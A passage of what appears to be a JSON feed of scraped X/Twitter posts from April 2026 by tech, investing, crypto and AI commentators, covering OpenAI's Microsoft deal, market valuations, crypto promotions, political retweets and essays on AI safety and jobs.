"nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "最近想玩链游的可以看看 @RealGoOfficial 这个游戏\n\n他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。\n\n他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如 Doge、Floki、Toshi 和 WIF 等等,之前和 @xhunt_ai 也有过合作。\n\n大概今年 Q2 会 TGE,有时间可以玩一玩,可以参加一下他们的忠诚度计划,玩游戏或交互都可以撸积分和代币。", + "url": "https://x.com/wolfyxbt/status/2048764088193569049", + "published_at": "2026-04-27T13:59:57+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048761760971096534", + "published_at": "2026-04-27T13:50:42+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "把 new-api 的 UI 用 Hero UI 重构了一遍。之前他们用的那个抖音的 semi 设计系统太垃圾了。", + "url": "https://x.com/dingyi/status/2048760423491764431", + "published_at": "2026-04-27T13:45:23+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://x.com/JeffDean/status/2048759102390899142", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://x.com/HarryStebbings/status/2048756619622707452", + "published_at": "2026-04-27T13:30:16+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://x.com/soumithchintala/status/2048756358820827564", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://x.com/sama/status/2048755148361707946", + "published_at": "2026-04-27T13:24:26+00:00", + "source": "nitter", + "title_zh": "人工智能公司宣布更新与微软的云计算合作,微软将维持主要合作伙伴地位,同时产品和服务可在多云平台部署,双方已达成延至2032年的模型供应协议及2030年收入分成安排。" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", + "url": "https://x.com/charliebilello/status/2048753179471323584", + "published_at": "2026-04-27T13:16:36+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://x.com/sama/status/2048751392031203544", + "published_at": "2026-04-27T13:09:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048751094671585397", + "published_at": "2026-04-27T13:08:19+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "未收货,仅退款,", + "url": "https://x.com/CuiMao/status/2048742972020470168", + "published_at": "2026-04-27T12:36:02+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the net error rate in counting presidential votes was 0.007%. The median shift in any county's vote count was zero.", + "url": "https://x.com/ylecun/status/2048740712556933170", + "published_at": "2026-04-27T12:27:04+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Linear CEO Karri Saarinen 关于 AI 的长文,难得的克制观察,没有狂热也没有唱衰。\n\n最反直觉的是\"专家悖论\"那段:AI 在你不懂的领域像魔法,在你懂的领域你看到漏洞和破绽——越懂行的人用 AI 越累,但专业能力也越值钱,因为它从\"动手做\"挪到\"知道什么叫好\"。\n\n\"计划无用,规划至上\"那章也好,讲规划真正的价值是逼组织对齐和决策,不在那份产出物。\n\n值得读全文。", + "url": "https://x.com/runes_leo/status/2048740695461228878", + "published_at": "2026-04-27T12:27:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: @grok 你说说呢", + "url": "https://x.com/CuiMao/status/2048739316969648376", + "published_at": "2026-04-27T12:21:31+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "一喝梅酒就浑身刺挠,,我这是过敏吗?", + "url": "https://x.com/CuiMao/status/2048736420198842831", + "published_at": "2026-04-27T12:10:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "栋哥换账号了,帮忙转发一下", + "url": "https://x.com/lxfater/status/2048726973682475250", + "published_at": "2026-04-27T11:32:28+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Image", + "url": "https://x.com/Stv_Lynn/status/2048713165232644251", + "published_at": "2026-04-27T10:37:36+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: AI has had one safest technology roll-outs in history.\n\nRead that again, because it's a fact. \n\nIt's used by billions with a tiny fraction of a percent of actual problems.\n\nAnd yet it's seen as dangerous or unsafe by many.\n\nThere's a constant chorus of people shouting about its supposed dangers with no evidence whatsoever where it matters most: here, in the real world.\n\nSo what do we actually have here in reality?\n\nA few cases in courts about early versions of ChatGPT allegedly being too sycophantic and not recognizing mental illness or someone in trouble, that are still making their way through courts and may prove wrong or right (some of the media released snippets are damning but not definitive).\n\nTime will tell. Innocent until proven guilty. The very nature of court litigation is often to find a scapegoat for something that gets thrown out in the actual process of the trial.\n\nBut outside of that, what? \n\nAnswer: not much.\n\nAnd viewed through the lens of other technology in history its incident rate is probably lower than lawnmowers.\n\nIt makes little sense when you think of it through the lens of other tech like cars and planes, which had atrocious early track records. \n\nAI even has a better track record of safety than nuclear.\n\nDespite being incredibly safe overall, nuclear had several high profile and dangerous failures with Three Mile Island and Fukishima.\n\nWith AI, nothing of the sort. Not even remotely.\n\nI can hear the naysayers now saying \"so far, but just you wait!\"\n\nAnd yet we keep waiting. And waiting. And waiting.\n\nAI fear is a remarkably resilient beast. \n\nIt's resilient despite zero actual harms manifesting here in reality land.\n\nSelf-driving cars are remarkably safer than humans who kill 1.2 million people and injure 50 million more each year world wide. (I wrote 1.5M in an early posted and missed my typo).\n\nWaymo cars are roughly 10X safer than humans with minimal injuries and fatalities. Even early self-driving cars had incredibly good safety records vis-a-vis early cars driven by humans that had bad safety records even up through the 1950s and 60s.\n\nWhen it comes to cars, society actually resisted making them safer. People fought having to wear seatbelts because they had to pay for them. They resisted early drunk driving laws as impingements on their freedom.\n\nEarly plane travels was incredibly dangerous. It took many many decades of work to make them the marvels of safety they are today.\n\nWhat about jobs?\n\nWe have AI execs talking about the \"end of work\" and yet they're hiring more people in the very profession that is supposedly most exposed: programming. Often at super high salaries approaching half a million dollars a year.\n\nDemand for good programmers is rising.\n\nWe've certainly had execs claim they let people go because of AI. But a deeper look at these claims quickly reveals that most of them are just an easy way to get around labor laws or to simp to shareholders and more readily attributable to COVID over hiring. Tell shareholders \"AI\" is the reason for layoffs and you're rewarded for being more \"efficient.\" Tell them you have to lay people off because you over hired or just made mistakes and your stock gets hammered.\n\nThe truth is that anyone who uses AI seriously at the frontier sees how much they have to baby sit it and hand hold it and steer it. It is not doing any job end to end. It's doing tasks and that is about it.\n\nNow it will certainly get better but will it magically make the leap from task to job? Maybe. But we'll need evidence of that in, you guessed it, reality before we start making policy decisions.\n\nSo what other problems do we have here in reality?\n\nNothing but the two problems I've already discussed at length in my work:\n\nSurveillance and weapons of war.\n\nBut these are not new. They're just things that AI enhances, just like computers enhanced them, and better materials science, and many other tech revolutions before them.\n\nAgain, ask yourself, really ask yourself, where are the real problems? \n\nAnd again, there's a loud chorus of people who keep shouting \"just you wait, I imagined this problem in my head and it's totally inevitable because I say so\" and yet billions of people are using this technology every day with no problems.\n\nNow you could say \"Russell's Turkey.\" The trend is the trend until it breaks. But then the burden is on you to prove the trend is breaking. There is no evidence of it other than in people's minds.\n\nAt what point do people just wake up and realize that none of this makes any sense?\n\nIt's not that there won't be problems. It's just that often times the problems we imagine (we've been imagining the end of all work for 100 years) don't match what happens in actual reality. The problems turn out to be very different and you can only deal with them when they come up.\n\nA lot of politicians today imagined if they had only \"gotten ahead\" of the Internet with regulations we'd be in a much better place.\n\nUtter nonsense. When Section 230 was passed the number one question among Congress was \"what is the Internet?\" And these folks are supposed to imagine TikTok 25 years later? \n\nNo. \n\nWe have to deal with problems as they come up, not imaginary problems that some very vocal people promise are coming. The burden is on them to prove it and writing long essays from \"first principles thinking\" and scary books does not count as evidence for anything at all.\n\nAt what point does the cognitive dissonance hit and people wake up and say, maybe I was wrong?\n\nProbably never.\n\nBeliefs are a tricky thing and wrong beliefs have caused more problems in world history than AI ever will.", + "url": "https://x.com/ylecun/status/2048709585360367651", + "published_at": "2026-04-27T10:23:22+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://x.com/paulg/status/2048704073356935676", + "published_at": "2026-04-27T10:01:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://x.com/paulg/status/2048701354672050286", + "published_at": "2026-04-27T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "以后有好东西是真不能说出去,大家都知道了很快就没了。。。DMIT 美区 Premium 竟然所有套餐都卖光了,前两天还全都有呢。", + "url": "https://x.com/dingyi/status/2048700446425165890", + "published_at": "2026-04-27T09:47:04+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "Meta 对 Manus 的收购被中国发改委驳回。\n看来以后要么一开始就出海,要么就不出海。", + "url": "https://x.com/0xAA_Science/status/2048685380304871774", + "published_at": "2026-04-27T08:47:12+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://x.com/paulg/status/2048677984106664227", + "published_at": "2026-04-27T08:17:48+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~", + "url": "https://x.com/0xAA_Science/status/2048666088733581805", + "published_at": "2026-04-27T07:30:32+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好\n\n现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了", + "url": "https://x.com/bozhou_ai/status/2048663377598452202", + "published_at": "2026-04-27T07:19:46+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Image", + "url": "https://x.com/ylecun/status/2048655735412650355", + "published_at": "2026-04-27T06:49:24+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 中文AI必关注12位高价值博主\n\nAI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。\n\n我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。\n\n1. 摸鱼巨匠 @SunNeverSetsX\nAI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强\n\n2. Rachel @Zesee\n前微软亚马逊产品人,现在深耕AI营销创业,分享产品开发实操和行业洞察,干货密度高\n\n3. 小将 @nftbanker\n欧洲GenAI大会主办方 + 最大华人AI出海社区创始人,副业创业和落地案例特别实在\n\n4. WaytoAGI @WaytoAGI\n中文AI知识库整理专家,像随身AI百科一样持续更新一手资讯和实战总结\n\n5. 汗青 HQ @hq4ai\n\nAI创意与AIGC艺术应用先锋,专注虚拟偶像、AI-IP创作和短视频灵感,技术与艺术结合得非常出色\n\n6. Mulight 沐光 @0xMulight\n专注AI工具深度测评 + 手机端高效工作流(Hermes WebUI等),自动化提效方案直接能用,实用党福音\n\n7. 阿西_出海 @axichuhai\nAI+LLM+Agent副业实战派,分享自媒体变现路径和真实落地打法\n\n8. 泊舟 @bozhou_ai\nVibe编码与Agent构建高手,系统Prompt和高效工作流拆解非常清晰\n\n9. berryxia @berryxia\nPrompt工程与AI工具设计专家,设计+编码+提示词三合一输出,质量顶尖\n\n10. CuiMao @CuiMao\n纯干货AI开发者,不接广告,专注深度学习实战分享\n\n11. GoSailGlobal @GoSailGlobal\n独立SaaS出海玩家,AI产品价值提炼和真实创业经验分享很接地气\n\n12. 范凯说 AI @fankaishuoai\nAI时代个人转型实战导师,提供可直接执行的框架和落地方法论", + "url": "https://x.com/bozhou_ai/status/2048640580004335669", + "published_at": "2026-04-27T05:49:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://x.com/paulg/status/2048615296613937201", + "published_at": "2026-04-27T04:08:42+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "狗B们在组团在 bags 分流太空狗,好恶心啊。\n下次它们买什么,咱们就去找个新盘子分,好吗?", + "url": "https://x.com/0xAA_Science/status/2048610365324623966", + "published_at": "2026-04-27T03:49:07+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。\n\n一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。\n\n它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广:\n\nAI 端:Claude Code、Codex、Cursor、Gemini CLI、Kimi CLI 等 10 多种\n聊天端:飞书、钉钉、Telegram、Slack、Discord、企业微信、QQ 等 11 个平台\n\n功能也挺全:\n1. 不需要公网 IP,大部分平台直接连\n2. 支持语音、图片、文件发送\n3. 多项目同时跑,一个进程搞定\n4. 会话管理,能创建、切换、看历史\n5. 斜杠命令控制模型切换、权限、工作目录\n6. 定时任务,用自然语言就能设\n7. 带 Web 管理界面,配置不用碰命令行\n8. 支持不同用户隔离运行,安全性有保障\n\n简单说就是:出门在外,手机上打开飞书或 Telegram 就能让 Claude Code 继续干活。\n\nhttp://github.com/chenhg5/cc-connect", + "url": "https://x.com/bozhou_ai/status/2048603768250585231", + "published_at": "2026-04-27T03:22:54+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "刚发现私信里好多人问:怎么搞 cursor,哪里申请。\n\n还有人更直接:账号密码发过来,给我用用。。。\n\n我。。。。。。", + "url": "https://x.com/dingyi/status/2048592243754504229", + "published_at": "2026-04-27T02:37:06+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "每天刷 timeline:\n\n外国人都是认真分享自己的作品、产品、生活。\n\n中国人都是:注册美国公司、买海外 sim 卡、薅羊毛、吵架撕逼……", + "url": "https://x.com/dingyi/status/2048585369315316105", + "published_at": "2026-04-27T02:09:47+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "不要骂我了,山寨季已经来过了\n\n$TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。\n\n觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。\n\n山寨币是赚钱容易而已,不是所有人都赚钱。", + "url": "https://x.com/wolfyxbt/status/2048581892333867398", + "published_at": "2026-04-27T01:55:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "人生第一次录播客,我们和cell老师一起聊聊中转站的那些事", + "url": "https://x.com/bozhou_ai/status/2048571760698949641", + "published_at": "2026-04-27T01:15:43+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://x.com/sama/status/2048554097985593849", + "published_at": "2026-04-27T00:05:31+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://x.com/sama/status/2048552677433643427", + "published_at": "2026-04-26T23:59:53+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @RiverdotInc 第五季创作者排名战正式打响🏆 \n赛季时间:4月22日 → 26年Q2结束📅 \n这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ \n另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 \n@River4fun 💧\n\n我也已经加入到第五季的战斗", + "url": "https://x.com/chuxiaeth/status/2048547844982976544", + "published_at": "2026-04-26T23:40:41+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor aurait lieu ailleurs. Il faut l'exploiter au mieux.\n\n👇 Discussion dans Le Monde", + "url": "https://x.com/ylecun/status/2048547683112046771", + "published_at": "2026-04-26T23:40:02+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "- @ferra_protocol 居然也上贵金属永续合约了🥇 \n现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 \n\n如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 \n\n交互链接: https://ferra.ag?code=tBYQfU0aq\n\n进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀", + "url": "https://x.com/chuxiaeth/status/2048545974747070599", + "published_at": "2026-04-26T23:33:15+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "A small library of quiet loaders.\n\nhttps://icons.icantcode.fyi/", + "url": "https://x.com/dingyi/status/2048536915222376906", + "published_at": "2026-04-26T22:57:15+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://x.com/HarryStebbings/status/2048531257399664920", + "published_at": "2026-04-26T22:34:46+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "豆包语录", + "url": "https://x.com/CuiMao/status/2048513403057283530", + "published_at": "2026-04-26T21:23:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://x.com/DavidSacks/status/2048502978626113625", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension.\n\nWe're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more easily directly within the X app.", + "url": "https://x.com/frxiaobei/status/2048487623250063516", + "published_at": "2026-04-26T19:41:23+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://x.com/HarryStebbings/status/2048486182904852537", + "published_at": "2026-04-26T19:35:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. \n\nThe result, predictably, is that they’ve stopped waiting for the lease to expire and started buying their own buildings.\nWhat’s happening now is qualitatively different from the grumbling of 2017-2019. Back then, European leaders still believed the relationship was cyclical – that America would eventually sober up and the old architecture would reassemble itself. \n\nThat belief is gone. Greenland changed everything. For ever. What replaced it are structural decisions: \n\nGerman rearmament on a scale not seen since before reunification, French-led European defence coordination that pointedly excludes Washington, South Korean quiet conversations about indigenous nuclear deterrence, Japanese defence spending hitting levels that would have been politically unthinkable five years ago.\n\nThe crucial dynamic is that these shifts generate their own momentum. A German arms industry rebuilt to supply a European force doesn’t get mothballed when the next US president calls. A generation of European defence planners trained to operate without American command integration doesn’t unlearn that. Trade relationships rerouted through new corridors don’t spontaneously return to their old paths just because someone in Washington eventually extends an olive branch.\n\nTrump appears to have understood American power as a static asset – something you could spend down for short-term leverage without diminishing the underlying account. \n\nWhat his allies understood, and what he didn’t, is that the asset was always relational. The moment they stopped believing in it, the balance sheet changed permanently.\nThe irony is almost classical. He wanted to make America’s allies pay more for American protection. Instead, he convinced them to stop needing it.", + "url": "https://x.com/ylecun/status/2048482084646240560", + "published_at": "2026-04-26T19:19:22+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://x.com/ylecun/status/2048469956627468510", + "published_at": "2026-04-26T18:31:11+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://x.com/DavidSacks/status/2048456433981591867", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://x.com/ylecun/status/2048453901930660058", + "published_at": "2026-04-26T17:27:23+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? \n\nHell no, right? \n\nBut the answer is actually \"hell yes\" because it's cars. \n\nYou probably got in one today and never even thought it could kill you. You normalized the risk so easily.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. \n\nIt's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the 